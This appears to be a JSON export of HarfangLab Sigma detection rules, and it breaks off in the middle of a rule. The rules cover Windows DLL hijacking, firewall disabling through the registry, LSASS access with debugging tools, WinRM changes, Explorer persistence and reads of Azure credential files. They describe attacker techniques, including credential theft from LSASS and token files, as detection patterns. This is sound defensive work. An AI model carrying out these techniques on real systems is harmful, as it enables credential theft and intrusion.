"content": "title: DLL Hijacking via netplwiz.exe\nid: 31dac5b8-d9c0-4cae-865a-9d528c8e6c00\ndescription: |\n Detects potential Windows DLL Hijacking via netplwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netplwiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\NETPLWIZ.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00",
"rule_name": "DLL Hijacking via netplwiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netplwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086751Z",
"creation_date": "2026-03-23T11:45:34.086753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086758Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/software/S0075/"
],
"name": "t1562_004_registry_disable_firewall_public_profile.yml",
"content": "title: Windows Firewall Disabled for Public Profile via Registry\nid: 31dd17cd-3ed5-4e4d-949f-71cfddc70c1e\ndescription: |\n Detects when the firewall is disabled for the public profile.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0075/\ndate: 2021/10/14\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0075\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall'\n Details: 'DWORD (0x00000000)'\n\n # Avoid detection when Windows firewall is disabled in graphic mode\n # We have specific rules to detect deactivation via netsh or powershell\n # This rule can match a deactivation via reg.exe for example (used by some malwares or test frameworks)\n filter_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetwork'\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetworkfirewall -p'\n - '?:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e",
"rule_name": "Windows Firewall Disabled for Public Profile via Registry",
"rule_description": "Detects when the firewall is disabled for the public profile.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nIt is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\n",
"rule_creation_date": "2021-10-14",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075072Z",
"creation_date": "2026-03-23T11:45:34.075074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075079Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_debugger_tracing_read_access.yml",
"content": "title: LSASS Accessed via Debugger Tool\nid: 31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778\ndescription: |\n Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\n Time Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\n This can be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/04\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Tttracer\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n\n selection_ttdinject_calltrace:\n CallTrace|contains: 'ttdinject.exe'\n\n selection_ttdinject_original_name:\n ProcessOriginalFileName: 'TTDInject.EXE'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778",
"rule_name": "LSASS Accessed via Debugger Tool",
"rule_description": "Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\nTime Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\nThis can be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\n",
"rule_creation_date": "2021-06-04",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3201beb0-92c6-4539-9056-3a82a91c968b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598735Z",
"creation_date": "2026-03-23T11:45:34.598739Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598746Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_dscacheutil_discovery_user_macos.yml",
"content": "title: Users Listed via dscacheutil\nid: 3201beb0-92c6-4539-9056-3a82a91c968b\ndescription: |\n Detects the execution of the dscacheutil command to query information about users.\n Adversaries can use this information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil.\nreferences:\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q user'\n\n exclusion_legitimate_parent:\n ParentImage:\n - '/Library/Application Support/AirWatch/hubd'\n - '/usr/local/libexec/ec2-macos-init'\n - '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3201beb0-92c6-4539-9056-3a82a91c968b",
"rule_name": "Users Listed via dscacheutil",
"rule_description": "Detects the execution of the dscacheutil command to query information about users.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-05-15",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3205ac34-383e-49e2-b12e-a0917cf9ef07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073489Z",
"creation_date": "2026-03-23T11:45:34.073491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073495Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1620_suspicious_dotnet_exchange.yml",
"content": "title: Suspicious Dotnet Assembly Loaded by Exchange Server\nid: 3205ac34-383e-49e2-b12e-a0917cf9ef07\ndescription: |\n Detects the loading suspicious a Dotnet library by Exchange Server.\n Attackers may dynamically load assemblies in Exchange to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3205ac34-383e-49e2-b12e-a0917cf9ef07",
"rule_name": "Suspicious Dotnet Assembly Loaded by Exchange Server",
"rule_description": "Detects the loading suspicious a Dotnet library by Exchange Server.\nAttackers may dynamically load assemblies in Exchange to stealthily execute further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n",
"rule_creation_date": "2025-07-25",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "32191273-d165-4ec0-87ae-c0ebbdbda1af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620831Z",
"creation_date": "2026-03-23T11:45:34.620832Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620837Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_winrm_service_auto.yml",
"content": "title: WinRM Service auto-start Enabled\nid: 32191273-d165-4ec0-87ae-c0ebbdbda1af\ndescription: |\n Detects when the Windows Remote Management (WinRM) service is set to auto-start.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organization.\n It is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinRM\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_exchange:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "32191273-d165-4ec0-87ae-c0ebbdbda1af",
"rule_name": "WinRM Service auto-start Enabled",
"rule_description": "Detects when the Windows Remote Management (WinRM) service is set to auto-start.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organization.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "323dc7e5-08a1-429c-83b5-3df588b5a245",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082314Z",
"creation_date": "2026-03-23T11:45:34.082316Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082320Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/explorertools.html",
"https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_explorer_tools.yml",
"content": "title: Possible Explorer Tools Persistence Added\nid: 323dc7e5-08a1-429c-83b5-3df588b5a245\ndescription: |\n Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\n This method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\n It is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\nreferences:\n - https://persistence-info.github.io/Data/explorertools.html\n - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\BackupPath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\cleanuppath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\defragpath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableStorage\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_tools:\n Details|contains:\n - '%SystemRoot%\\system32\\sdclt.exe'\n - '%SystemRoot%\\System32\\cleanmgr.exe'\n - '%systemroot%\\system32\\dfrgui.exe'\n - '%systemroot%\\system32\\wbadmin.msc'\n\n exclusion_iobit:\n ProcessImage:\n - '?:\\Program Files\\iobit\\advanced systemcare\\ascinit.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\ascinit.exe'\n Details:\n - '?:\\Program Files\\iobit\\advanced systemcare\\diskdefrag.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\diskdefrag.exe'\n\n exclusion_defraggler:\n Details:\n - '?:\\program files\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\defraggler\\defraggler64.exe'\n - '?:\\program files\\utilitaires disque\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\utilitaires disque\\defraggler\\defraggler64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "323dc7e5-08a1-429c-83b5-3df588b5a245",
"rule_name": "Possible Explorer Tools Persistence Added",
"rule_description": "Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\nThis method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\nIt is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3309bac8-843b-4a14-91b2-c7af144c1be8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625588Z",
"creation_date": "2026-03-23T11:45:34.625590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625594Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_azure_config_read_macos.yml",
"content": "title: Suspicious Access to Azure Configuration File\nid: 3309bac8-843b-4a14-91b2-c7af144c1be8\ndescription: |\n Detects an attempt to read the contents of the Azure configuration file.\n Adversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/.azure/azureProfile.json'\n - '/Users/*/.azure/accessTokens.json'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - 